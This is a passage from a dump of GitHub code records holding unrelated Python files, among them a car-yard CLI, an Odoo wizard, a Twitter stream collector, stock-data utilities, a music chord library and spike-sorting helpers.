prompt='Vehicle Year', required=True, type=int, help='Year of the vehicle')\n@click.option('--price', prompt='Vehicle Price', required=True, type=float, help='Price of the vehicle')\ndef add_vehicle(make, model, year, price):\n \"\"\"Add a new vehicle to the database.\"\"\"\n vehicle = Vehicle(make=make, model=model, year=year, price=price)\n session.add(vehicle)\n session.commit()\n click.echo('Vehicle information saved successfully!')\n\ncli.add_command(add_vehicle)\n\n# Existing Click commands\n\n@click.command()\ndef list_vehicles():\n \"\"\"List all your vehicles from the database.\"\"\"\n \n try:\n # Query the database to get all vehicles\n vehicles = session.query(Vehicle).all()\n\n if not vehicles:\n click.echo(\"You don't have any vehicles in the database.\")\n else:\n # Display the list of vehicles\n click.echo(\"List of your vehicles:\")\n for vehicle in vehicles:\n click.echo(f\"ID: {vehicle.id}, Make: {vehicle.make}, Model: {vehicle.model}, Year: {vehicle.year}, Price: {vehicle.price}\")\n\n except Exception as e:\n click.echo(f\"An error occurred: {str(e)}\")\n \ncli.add_command(list_vehicles)\n\n@click.command()\n@click.option('--id', prompt='Vehicle ID', required=True, type=int, help='ID of the vehicle to update')\n@click.option('--newprice', prompt='New Price', required=True, type=float, help='New price for the vehicle')\n\ndef update_price(id , newprice):\n \"\"\"Update vehicles from the database.\"\"\"\n\n try:\n \n vehicle = session.query(Vehicle).filter_by(id=id).first()\n if not vehicle:\n click.echo(f\"Vehicle with ID {id} not found in the database.\")\n\n else:\n #now update the vehicleprice\n vehicle.price = newprice\n session.commit()\n click.echo(f\"Price of Vehicle ID {id} updated to {newprice} successfully.\")\n\n except Exception as e:\n click.echo(f\"An error occurred: {str(e)}\")\n\ncli.add_command(update_price)\n\n@click.command()\n@click.option('--id', prompt='Vehicle ID', required=True, type=int, help='ID of the vehicle to delete')\n\ndef delete_vehicle(id):\n \"\"\"Delete a vehicle from the database.\"\"\"\n\n try:\n # Query the database to find the vehicle by ID\n vehicle = session.query(Vehicle).filter_by(id=id).first()\n\n if not vehicle:\n click.echo(f\"Vehicle with ID {id} not found in the database.\")\n else:\n # Delete the vehicle from the database\n session.delete(vehicle)\n session.commit()\n click.echo(f\"Vehicle with ID {id} deleted successfully.\")\n\n except Exception as e:\n click.echo(f\"An error occurred: {str(e)}\")\n\ncli.add_command(delete_vehicle)\n\nif __name__ == '__main__':\n cli()\n","repo_name":"kentechcomps/CARYARDMANAGEMENTSYSTEM","sub_path":"App/caryard.py","file_name":"caryard.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12367779314","text":"from odoo import api, fields, models\nfrom odoo.models import expression\nfrom odoo.tools.safe_eval import safe_eval\n\n\nclass WizCreateAssistanceIssue(models.TransientModel):\n _name = \"wiz.create.assistance.issue\"\n _description = \"Wizard for assistance issue creation\"\n\n @api.model\n def _get_selection_dayofweek(self):\n return self.env[\"resource.calendar.attendance\"].fields_get(\n allfields=[\"dayofweek\"])[\"dayofweek\"][\"selection\"]\n\n partner_ids = fields.Many2many(\n comodel_name=\"res.partner\",\n string=\"Students\",\n )\n date = fields.Date(\n required=True,\n default=fields.Date.context_today,\n )\n dayofweek = fields.Selection(\n selection=\"_get_selection_dayofweek\",\n string=\"Day of Week\",\n compute=\"_compute_dayofweek\",\n )\n\n @api.model\n def default_get(self, fields):\n result = super(WizCreateAssistanceIssue, self).default_get(fields)\n if self.env.context.get(\"active_ids\"):\n result.update({\n \"partner_ids\": [\n (6, 0, self.env.context.get(\"active_ids\"))],\n })\n return result\n\n @api.depends(\"date\")\n def _compute_dayofweek(self):\n for record in self:\n record.dayofweek = str(record.date.weekday())\n\n @api.multi\n def create_assistance_issues(self):\n assistance_type = self.env.ref(\"issue_education.assistance_issue_type_master\")\n assistance_school_types = self.env[\"school.college.issue.type\"].search([\n (\"issue_type_id\", \"=\", assistance_type.id),\n ])\n issue_obj = issues = self.env[\"school.issue\"]\n academic_year = self.env[\"education.academic_year\"].search([\n (\"date_start\", \"<=\", self.date),\n (\"date_end\", \">=\", self.date),\n ])\n for partner in self.partner_ids:\n for group in partner.student_group_ids.filtered(\n lambda g: g.academic_year_id == academic_year):\n assistance_school_type = assistance_school_types.filtered(\n lambda t: t.school_id == group.center_id and\n t.education_level_id == group.level_id)\n for schedule in group.schedule_ids.filtered(\n lambda s: not s.timetable_ids or\n self.dayofweek in s.mapped(\"timetable_ids.dayofweek\")):\n group = schedule.group_ids.filtered(\n lambda g: partner in g.student_ids)[:1]\n issue = issue_obj._find_issue(\n partner.id, self.date, assistance_school_type[:1].id,\n group.id, schedule.id)\n if not issue:\n issue_vals = issue_obj.prepare_issue_vals(\n self.date, assistance_school_type[:1], partner,\n schedule, group)\n issue = issue_obj.create(issue_vals)\n issues |= issue\n action = self.env.ref(\"issue_education.action_school_issue\")\n action_dict = action.read()[0] if action else {}\n domain = expression.AND([\n [(\"id\", \"in\", issues.ids)],\n safe_eval(action.domain or \"[]\")])\n action_dict.update({\"domain\": domain})\n return action_dict\n","repo_name":"avanzosc/education","sub_path":"issue_education_kanban_view/wizard/wiz_create_assistance_issue.py","file_name":"wiz_create_assistance_issue.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"18775243740","text":"\"\"\"empty message\n\nRevision ID: daf4196036e5\nRevises: 61ba38623d87\nCreate Date: 2019-01-03 16:52:47.117880\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'daf4196036e5'\ndown_revision = '61ba38623d87'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('data',\n sa.Column('data_id', sa.Integer(), nullable=False),\n sa.Column('value', sa.Integer(), nullable=True),\n sa.Column('created_at', sa.TIMESTAMP(), nullable=True),\n sa.Column('sensor_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['sensor_id'], ['sensor.sensor_id'], ),\n sa.PrimaryKeyConstraint('data_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('data')\n # ### end Alembic commands ###\n","repo_name":"MaximePillon/iot_server","sub_path":"migrations/versions/daf4196036e5_.py","file_name":"daf4196036e5_.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70570976805","text":"# 출처: https://programmers.co.kr/learn/courses/30/lessons/64064#\n\nimport re\nfrom itertools import product\n\ndef solution(user_id, banned_id):\n candidates_id = []\n\n for ban in banned_id:\n candidates = []\n ban_re = re.compile(ban.replace(\"*\", \"\\w\"))\n\n for user in user_id:\n if len(user) == len(ban) and ban_re.match(user) is not None:\n candidates.append(user)\n\n candidates_id.append(candidates)\n\n candidates_product = list(product(*candidates_id))\n new_candidates = []\n\n for candidate_tuple in candidates_product:\n if len(candidate_tuple) == len(set(candidate_tuple)):\n new_candidates.append(candidate_tuple)\n\n answer_set = set()\n for candidate in new_candidates:\n candidate_list = sorted(list(candidate))\n answer_set.add(tuple(candidate_list))\n \n return len(answer_set)\n \n","repo_name":"jeanP-tech/Algorithms","sub_path":"불량 사용자.py","file_name":"불량 사용자.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23485315292","text":"#!/usr/bin/env python\n\n# check if product is present for each CDS in a genbank file (arg1)\n\n\nimport sys\nfrom Bio import SeqIO\n\n\nCDS_missing = []\nRNA_missing = []\n\n\nwith open(sys.argv[1], 'r') as gbfile:\n\tgenbanks = SeqIO.parse(gbfile, 'genbank')\n\tfor gb in genbanks:\n\t\tfor feature in gb.features:\n\t\t\tif feature.type == 'CDS':\n\t\t\t\tif 'product' not in feature.qualifiers:\n\t\t\t\t\tCDS_missing.append(feature.qualifiers['gene'][0])\n\t\t\telif 'RNA' in feature.type:\n\t\t\t\tif 'product' not in feature.qualifiers:\n\t\t\t\t\tRNA_missing.append(feature.qualifiers['gene'][0])\n\n#print('Features missing product qualifier:')\n#print('\\tCDS: ' + '\\t'.join(CDS_missing))\n#print('\\tRNA: ' + '\\t'.join(RNA_missing))\nfor item in CDS_missing:\n\tprint(item)\nfor item in RNA_missing:\n\tprint(item)\n","repo_name":"bmichanderson/scripts","sub_path":"check_product.py","file_name":"check_product.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23754253510","text":"#coding=utf-8\r\n\r\nimport pymysql\r\nimport traceback\r\nimport codecs\r\nimport os\r\n\r\nimport urllib.parse\r\nimport urllib.request\r\nimport json\r\nimport datetime\r\n\r\ndef reconnect_mysql():\r\n conn= pymysql.connect(\r\n host='localhost',\r\n port = 3306,\r\n user='root',\r\n passwd='root',\r\n db ='stock',\r\n charset=\"utf8\",)\r\n cur = conn.cursor()\r\n return conn,cur\r\n\r\ndef get_sohu_stock_data(code, start_day, end_day):\r\n '''获取sohu的stock数据''' \r\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\r\n headers = { 'User-Agent' : user_agent }\r\n url='http://q.stock.sohu.com/hisHq'\r\n param = \"code=\"+code+\"&end=\"+end_day+\"&start=\"+start_day\r\n url += \"?\"+param\r\n req = urllib.request.Request(url)\r\n res = urllib.request.urlopen(req)\r\n\r\n res = res.read().decode('utf-8')\r\n print(res)\r\n if len(res)< 30:\r\n return \"\"\r\n resj = json.loads(res)\r\n print(resj)\r\n if resj[0]['status'] != 0:\r\n return \"\"\r\n return resj[0]\r\n\r\ndef get_all_stock_code():\r\n '''获取大概所有的 股票的代码,写入到文件'''\r\n start=\"20171024\" \r\n end=\"20171024\"\r\n code_list = []\r\n for c in range(1000):\r\n code = \"cn_000\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n code = \"cn_002\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n code = \"cn_300\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n code = \"cn_600\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n code = \"cn_601\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n with codecs.open(\"code.txt\", 'w', 'utf-8') as fw:\r\n for c in code_list:\r\n fw.write(c + \"\\n\")\r\n\r\ndef read_stock_code():\r\n ''' 读取股票code,返回list'''\r\n result_list = []\r\n with codecs.open(\"code.txt\", 'r', 'utf-8') as fr:\r\n for line in fr:\r\n result_list.append(line.strip())\r\n return result_list\r\n\r\n\r\n\r\n\r\ndef str2datetime(date_str):\r\n ''' \r\n 将字符串,转换成datetime,\r\n 字符串格式需要是2017-10-10格式类型的\r\n '''\r\n oneday = datetime.datetime.strptime(\"date_str\", '%Y-%m-%d')\r\n return oneday\r\n\r\ndef before_n_day(date, before_n):\r\n '''\r\n 某个日期之前的n天,返回datetime类型的\r\n '''\r\n before_datetime = datetime.timedelta(days=before_n)\r\n oneday = date - before_datetime\r\n return oneday\r\n\r\ndef after_n_day(date, after_n):\r\n '''\r\n 某个日期之后的n天,返回datetime类型的\r\n '''\r\n after_datetime = datetime.timedelta(days=after_n)\r\n oneday = date - after_datetime\r\n return oneday\r\n\r\ndef datetime2str(date):\r\n '''\r\n datetime转换成字符串\r\n '''\r\n return date.strftime('%Y-%m-%d')\r\n\r\ndef read_one_stock_data(code, start_day, end_day):\r\n '''\r\n 读取一个股票的某个时间段的数据\r\n '''\r\n\r\n conn,cur = reconnect_mysql()\r\n '''\r\n sql = \"select Id,name,day,open,close, change_price, change_ratio, low, high, \" + \\\r\n \"unknow1, unknow2, unknow3 from dayinfo where name='\" + code + \"' and day>='\"+start_day+\"' and day<='\"+end_day+\"' order by day asc\"\r\n '''\r\n sql = \"select * from dayinfo where name='\" + code + \"' and day>='\"+start_day+\"' and day<='\"+end_day+\"' order by day asc\"\r\n try:\r\n cur.execute(sql)\r\n result = cur.fetchall()\r\n except :\r\n print(\"error %s\" % sql)\r\n return \"\"\r\n return result\r\n\r\ndef get_one_stock_close_price_avg(code, start_day, end_day):\r\n '''\r\n 得到某个股票,某个时间段内,收盘价格的均值和方差\r\n '''\r\n stock_data_list = read_one_stock_data(code, start_day, end_day)\r\n all_price = 0 \r\n for stock_data in stock_data_list:\r\n close_price = stock_data[4]\r\n all_price += float(close_price)\r\n avg_price = all_price/len(stock_data_list)\r\n\r\n # 方差\r\n squre_sum = 0\r\n for stock_data in stock_data_list:\r\n close_price = stock_data[4]\r\n squre_sum += (close_price - avg_price) * (close_price - avg_price)\r\n var_price = squre_sum/ len(stock_data_list)\r\n return avg_price, var_price\r\n\r\n\r\nif __name__==\"__main__\":\r\n get_all_stock_code()","repo_name":"thewintersun/stock_analytics","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8368924760","text":"from __future__ import annotations\n\nimport functools\nimport itertools\nimport random\nfrom typing import TYPE_CHECKING\nfrom typing import Any\nfrom typing import ClassVar\n\nfrom musiclib import config\nfrom musiclib.note import Note\nfrom musiclib.note import SpecificNote\nfrom musiclib.noterange import NoteRange\nfrom musiclib.noteset import NoteSet\nfrom musiclib.svg.piano import Piano\nfrom musiclib.util.cache import Cached\n\nif TYPE_CHECKING:\n from collections.abc import Iterator\n\n\nclass Chord(NoteSet):\n \"\"\"\n Chord is a set of notes with a root note\n \"\"\"\n intervals_to_name: ClassVar[dict[frozenset[int], str]] = {\n # triads\n frozenset({0, 4, 7}): 'major',\n frozenset({0, 3, 7}): 'minor',\n frozenset({0, 3, 6}): 'diminished',\n # 7th\n frozenset({0, 4, 7, 11}): 'maj7',\n frozenset({0, 4, 7, 10}): '7',\n frozenset({0, 3, 7, 10}): 'min7',\n frozenset({0, 3, 6, 10}): 'half-dim7',\n frozenset({0, 3, 6, 9}): 'dim7',\n # 6th\n frozenset({0, 4, 7, 9}): '6',\n frozenset({0, 3, 7, 9}): 'm6',\n # etc\n frozenset({0, 4, 8}): 'aug',\n frozenset({0, 2, 7}): 'sus2',\n frozenset({0, 5, 7}): 'sus4',\n }\n name_to_intervals: ClassVar[dict[str, frozenset[int]]] = {v: k for k, v in intervals_to_name.items()}\n root: Note\n name: str\n\n def __init__(self, notes: frozenset[Note], *, root: Note) -> None:\n if root is None:\n raise TypeError('Chord requires root note. Use NoteSet if there is no root')\n super().__init__(notes, root=root)\n\n def _repr_svg_(self, **kwargs: Any) -> str:\n kwargs.setdefault('title', f'{self.root.name} {self.name}')\n return super()._repr_svg_(**kwargs)\n\n\nclass SpecificChord(Cached):\n def __init__(\n self,\n notes: frozenset[SpecificNote],\n *,\n root: str | Note | None = None,\n ) -> None:\n if not isinstance(notes, frozenset):\n raise TypeError(f'expected frozenset, got {type(notes)}')\n\n if isinstance(root, str):\n root = Note(root)\n\n notes_abstract = SpecificNote.to_abstract(notes)\n if root is not None and root not in notes_abstract:\n raise KeyError('root should be one of notes')\n\n self.notes = notes\n self.root = root\n self.abstract = Chord(notes_abstract, root=root) if root is not None else NoteSet(notes_abstract)\n self.root_specific = frozenset(note for note in notes if note.abstract == root) if root is not None else frozenset()\n\n self.notes_ascending = tuple(sorted(notes))\n self.intervals = tuple(note - self.notes_ascending[0] for note in self.notes_ascending) # from lowest note\n self.key = self.notes, self.root\n\n @classmethod\n def random(cls, n_notes: int | None = None, octaves: tuple[int, ...] = (3, 4, 5)) -> SpecificChord:\n if n_notes is None:\n n_notes = random.randint(2, 5)\n notes_space = tuple(\n SpecificNote(note, octave)\n for note, octave in itertools.product(config.chromatic_notes, octaves)\n )\n notes = frozenset(random.sample(notes_space, n_notes))\n return cls(notes)\n\n @classmethod\n def from_str(cls, string: str) -> SpecificChord:\n notes_, _, root_ = string.partition('/')\n root = Note(root_) if root_ else None\n notes_2 = notes_.split('_')\n if len(notes_2) != len(set(notes_2)):\n raise NotImplementedError('SpecificChord_s with non unique notes are not supported')\n notes = frozenset(SpecificNote.from_str(note) for note in notes_2)\n return cls(notes, root=root)\n\n def notes_combinations(self) -> Iterator[tuple[SpecificNote, SpecificNote]]:\n yield from itertools.combinations(self.notes_ascending, 2)\n\n def find_intervals(self, interval: int) -> tuple[tuple[SpecificNote, SpecificNote], ...]:\n return tuple((n, m) for n, m in self.notes_combinations() if abs(m - n) == interval)\n\n def __len__(self) -> int:\n return len(self.notes)\n\n def __getitem__(self, item: int) -> SpecificNote:\n return self.notes_ascending[item]\n\n def __iter__(self) -> Iterator[SpecificNote]:\n return iter(self.notes_ascending)\n\n def __contains__(self, item: object) -> bool:\n if not isinstance(item, SpecificNote):\n return NotImplemented\n return item in self.notes\n\n def __repr__(self) -> str:\n x = '_'.join(repr(note) for note in self.notes_ascending)\n if self.root is not None:\n return f'{x}/{self.root.name}'\n return x\n\n def __eq__(self, other: object) -> bool:\n if not isinstance(other, SpecificChord):\n return NotImplemented\n return self.key == other.key\n\n def __hash__(self) -> int:\n return hash(self.key)\n\n def __sub__(self, other: SpecificChord) -> int:\n return sum(abs(a - b) for a, b in zip(self, other, strict=True))\n\n def __add__(self, other: int) -> SpecificChord:\n \"\"\"transpose\"\"\"\n if not isinstance(other, int):\n raise TypeError('only adding integers is allowed (transposition)')\n root = self.root + other if self.root is not None else None\n return SpecificChord(frozenset(note + other for note in self), root=root)\n\n @functools.cached_property\n def transposed_to_C0(self) -> SpecificChord:\n return self + (SpecificNote('C', 0) - self[0])\n\n def _repr_svg_(self, **kwargs: Any) -> str:\n kwargs.setdefault('noterange', NoteRange(self[0], self[-1]) if self.notes else None)\n kwargs.setdefault('classes', ('card',))\n kwargs.setdefault('title', repr(self))\n kwargs.setdefault('note_colors', dict.fromkeys(self.notes, config.RED))\n kwargs.setdefault('squares', {note: {'text': str(note), 'text_size': '8'} for note in self})\n return Piano(**kwargs)._repr_svg_()\n\n def __getnewargs_ex__(self) -> tuple[tuple[frozenset[SpecificNote]], dict[str, Note | None]]:\n return (self.notes,), {'root': self.root}\n","repo_name":"tandav/musiclib","sub_path":"src/musiclib/chord.py","file_name":"chord.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"35481921648","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer, ValidationError\n\nfrom core.models import Category, Site\n\n\nclass CategorySerializer(ModelSerializer):\n class Meta:\n fields = (\"id\", \"name\")\n model = Category\n\n\nclass SiteSerializer(serializers.Serializer):\n id = serializers.IntegerField(label=\"ID\", read_only=True)\n category = serializers.CharField()\n url = serializers.URLField()\n\n def validate_category(self, value):\n if not Category.objects.filter(name=value):\n raise ValidationError(\"Invalid Category.\")\n return value\n","repo_name":"nixocio/savite","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27900178259","text":"from sklearn import preprocessing\nimport pandas as pd\n\n\ndef fill_na_mean(columns, dataframe):\n \"\"\"\n :param columns: columns of which na values have to be filled with mean\n :param dataframe: dataframe of interest\n \"\"\"\n for column in columns:\n dataframe[column].fillna(int(dataframe[column].mean()), inplace=True)\n\n\ndef fill_na_zero(columns, dataframe):\n \"\"\"\n :param columns: columns of which na values have to be filled with mean\n :param dataframe: dataframe of interest\n \"\"\"\n for column in columns:\n dataframe[column].fillna(\"0\", inplace=True)\n\n\ndef from_categorical_to_numerical(dataframe):\n _list = []\n for col in dataframe.columns:\n if type(dataframe[col][0]) == type('str'):\n _list.append(col)\n\n dataframe[_list] = dataframe[_list].astype('str')\n\n le = preprocessing.LabelEncoder()\n for li in _list:\n le.fit(list(set(dataframe[li])))\n dataframe[li] = le.transform(dataframe[li])\n\ndef subset_by_iqr(df, column, whisker_width=1.5):\n \"\"\"Remove outliers from a dataframe by column, including optional\n whiskers, removing rows for which the column value are\n less than Q1-1.5IQR or greater than Q3+1.5IQR.\n Args:\n df (`:obj:pd.DataFrame`): A pandas dataframe to subset\n column (str): Name of the column to calculate the subset from.\n whisker_width (float): Optional, loosen the IQR filter by a\n factor of `whisker_width` * IQR.\n Returns:\n (`:obj:pd.DataFrame`): Filtered dataframe\n \"\"\"\n # Calculate Q1, Q2 and IQR\n q1 = df[column].quantile(0.25)\n q3 = df[column].quantile(0.75)\n iqr = q3 - q1\n # Apply filter with respect to IQR, including optional whiskers\n filter = (df[column] >= q1 - whisker_width * iqr) & (df[column] <= q3 + whisker_width * iqr)\n return df.loc[filter]\n\ndef return_submission_csv(prediction):\n id_list = range(1461, 2920)\n df = pd.DataFrame({'Id': id_list, 'SalePrice': prediction.flatten()})\n df = df.set_index('Id')\n df.to_csv('data/log_submission_test.csv')\n return df\n","repo_name":"thom145/HousePrediction","sub_path":"CleanData.py","file_name":"CleanData.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37103983667","text":"import tweepy\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport subprocess\nimport json\nimport os\nimport sys\n\nconfigjson = {}\narg = sys.argv\n# read config file\nwith open(arg[1],'r') as configfile:\n\tfor line in configfile:\n\t\tconfigjson = json.loads(line)\n\n# setup api\nauth = OAuthHandler(configjson['consumer_key'],configjson['consumer_secret'])\nauth.set_access_token(configjson['access_token'],configjson['access_secret'])\n\napi = tweepy.API(auth)\nkeywords = arg[3].split(',')\ntopic = arg[2]\n# check if topic folder exist\nif not os.path.exists(topic):\n\tos.makedirs(topic)\n# change active directory to topic directory\nos.chdir(topic)\n\nglobal counter\ncounter = 0\n\ntwitter_dump_file = open(topic+'.tweet','a')\n\nclass MyListener(StreamListener):\n\tdef on_data(self,data):\n\t\ttry:\n\t\t\t# we interested in english language only\n\t\t\tjsondata = json.loads(data)\n\t\t\tif 'lang' in jsondata.keys() and jsondata['lang']=='en':\n\t\t\t\t# we are interested in data that have cascade\n\t\t\t\t# expanded_url, user_mentions, retweeted_status, quoted_status, in_reply_to_status_id\n\t\t\t\tif len(jsondata['entities']['urls'])>0 \\\n\t\t\t\tor len(jsondata['entities']['user_mentions']) > 0 \\\n\t\t\t\tor jsondata['in_reply_to_status_id'] is not None \\\n\t\t\t\tor jsondata['is_quote_status'] \\\n\t\t\t\tor 'retweeted_status' in jsondata.keys():\n\t\t\t\t\ttwitter_dump_file.writelines(data)\n#\t\t\tglobal counter\n#\t\t\tif(counter>10000):\n#\t\t\t\tcounter=0\n#\t\t\t\tprint('flush file')\n#\t\t\tcounter+=1\n\t\texcept BaseException as e:\n\t\t\tprint('Error on data {}'.format(str(e)))\n\t\treturn True\n\tdef on_error(self,status):\n\t\tprint(status)\n\t\treturn True\n\n# stream\ntwitter_stream = Stream(auth,MyListener())\n# follow user stream\n# twitter_stream.filter(follow = ['292432955'])\n# tracking hashtag\ntwitter_stream.filter(track = keywords)\n\n","repo_name":"BravoChi/CS511_Project_17Spring","sub_path":"python-twitter/tweet-dump-all.py","file_name":"tweet-dump-all.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41542222733","text":"# -*- coding: utf-8 -*-\n# +\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plotSignal(signal, sampling_freq, from_in_s=0, to_in_s=None, show=True):\n \"\"\"\n Plots data from a single channel\n\n :param analog_stream: A AnalogStream object\n :param sampling_freq: Sampling frequency\n :param from_in_s: The start timestamp of the plot (0 <= from_in_s < to_in_s). Default: 0\n :param to_in_s: The end timestamp of the plot (from_in_s < to_in_s <= duration). Default: None (= recording duration)\n :param show: If True (default), the plot is directly created. For further plotting, use show=False\n \"\"\"\n # get start and end index\n from_idx = max(0, int(from_in_s * sampling_freq))\n if to_in_s is None:\n to_idx = analog_stream.channel_data.shape[1]\n else:\n to_idx = min(analog_stream.channel_data.shape[1], int(to_in_s * sampling_frequency))\n\n # get the timestamps for each sample\n time = analog_stream.get_channel_sample_timestamps(channel_id, from_idx, to_idx)\n\n # scale time to seconds:\n scale_factor_for_second = Q_(1,time[1]).to(ureg.s).magnitude\n time_in_sec = time[0] * scale_factor_for_second\n\n # get the signal\n signal = analog_stream.get_channel_in_range(channel_id, from_idx, to_idx)\n\n # scale signal to µV:\n scale_factor_for_uV = Q_(1,signal[1]).to(ureg.uV).magnitude\n signal_in_uV = signal[0] * scale_factor_for_uV\n\n # construct the plot\n _ = plt.figure(figsize=(20,6))\n _ = plt.plot(time_in_sec, signal_in_uV)\n _ = plt.xlabel('Time (%s)' % ureg.s)\n _ = plt.ylabel('Voltage (%s)' % ureg.uV)\n _ = plt.title('Channel %s' % channel_info.info['Label'])\n if show:\n plt.show()\n \n\ndef detect_threshold_crossings(signal, fs, threshold, dead_time):\n \"\"\"\n Detect threshold crossings in a signal with dead time and return them as an array\n\n The signal transitions from a sample above the threshold to a sample below the threshold for a detection and\n the last detection has to be more than dead_time apart from the current one.\n\n :param signal: The signal as a 1-dimensional numpy array\n :param fs: The sampling frequency in Hz\n :param threshold: The threshold for the signal\n :param dead_time: The dead time in seconds.\n \"\"\"\n dead_time_idx = dead_time * fs\n threshold_crossings = np.diff((signal <= threshold).astype(int) > 0).nonzero()[0]\n distance_sufficient = np.insert(np.diff(threshold_crossings) >= dead_time_idx, 0, True)\n while not np.all(distance_sufficient):\n # repeatedly remove all threshold crossings that violate the dead_time\n threshold_crossings = threshold_crossings[distance_sufficient]\n distance_sufficient = np.insert(np.diff(threshold_crossings) >= dead_time_idx, 0, True)\n return threshold_crossings\n\ndef get_next_minimum(signal, index, max_samples_to_search):\n \"\"\"\n Returns the index of the next minimum in the signal after an index\n\n :param signal: The signal as a 1-dimensional numpy array\n :param index: The scalar index\n :param max_samples_to_search: The number of samples to search for a minimum after the index\n \"\"\"\n search_end_idx = min(index + max_samples_to_search, signal.shape[0])\n min_idx = np.argmin(signal[index:search_end_idx])\n return index + min_idx\n\ndef align_to_minimum(signal, fs, threshold_crossings, search_range):\n \"\"\"\n Returns the index of the next negative spike peak for all threshold crossings\n\n :param signal: The signal as a 1-dimensional numpy array\n :param fs: The sampling frequency in Hz\n :param threshold_crossings: The array of indices where the signal crossed the detection threshold\n :param search_range: The maximum duration in seconds to search for the minimum after each crossing\n \"\"\"\n search_end = int(search_range*fs)\n aligned_spikes = [get_next_minimum(signal, t, search_end) for t in threshold_crossings]\n return np.array(aligned_spikes)\n\ndef extract_waveforms(signal, fs, spikes_idx, pre, post):\n \"\"\"\n Extract spike waveforms as signal cutouts around each spike index as a spikes x samples numpy array\n\n :param signal: The signal as a 1-dimensional numpy array\n :param fs: The sampling frequency in Hz\n :param spikes_idx: The sample index of all spikes as a 1-dim numpy array\n :param pre: The duration of the cutout before the spike in seconds\n :param post: The duration of the cutout after the spike in seconds\n \"\"\"\n cutouts = []\n pre_idx = int(pre * fs)\n post_idx = int(post * fs)\n for index in spikes_idx:\n if index-pre_idx >= 0 and index+post_idx <= signal.shape[0]:\n cutout = signal[(index-pre_idx):(index+post_idx)]\n cutouts.append(cutout)\n return np.stack(cutouts)\n\ndef plot_waveforms(cutouts, fs, pre, post, n=100, color='k', show=True):\n \"\"\"\n Plot an overlay of spike cutouts\n\n :param cutouts: A spikes x samples array of cutouts\n :param fs: The sampling frequency in Hz\n :param pre: The duration of the cutout before the spike in seconds\n :param post: The duration of the cutout after the spike in seconds\n :param n: The number of cutouts to plot, or None to plot all. Default: 100\n :param color: The line color as a pyplot line/marker style. Default: 'k'=black\n :param show: Set this to False to disable showing the plot. Default: True\n \"\"\"\n if n is None:\n n = cutouts.shape[0]\n n = min(n, cutouts.shape[0])\n time_in_us = np.arange(-pre*1000, post*1000, 1e3/fs)\n if show:\n _ = plt.figure(figsize=(10,6))\n\n for i in range(n):\n _ = plt.plot(time_in_us, cutouts[i,]*1e6, color, linewidth=1, alpha=0.3)\n _ = plt.xlabel('Time (ms)')\n _ = plt.ylabel('Voltage (mV)')\n _ = plt.title('Spike Waveforms')\n\n if show:\n plt.show()\n","repo_name":"BIPN145/SpikeSorting","sub_path":"spikesorting_helperfunctions.py","file_name":"spikesorting_helperfunctions.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23507768722","text":"import numpy as np\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nt , l , dl=np.loadtxt('merenja3.txt' , unpack=True)\n\ndef fun(x,a,b,c):\n return a*x*x+b*x+c\n\nparametri, cov=curve_fit(fun, t, l , sigma=dl)\ngreske_parametara=np.sqrt(np.diag(cov))\n\nprint('Parametar a je:', parametri[0],'+/-', greske_parametara[0])\n#ovo nula mi je prvi clan svih parametara, dakle a\nprint('parametar be je:', parametri[1], '+/-', greske_parametara[1])\nprint('Parametar c je:', parametri[2], '+/-', 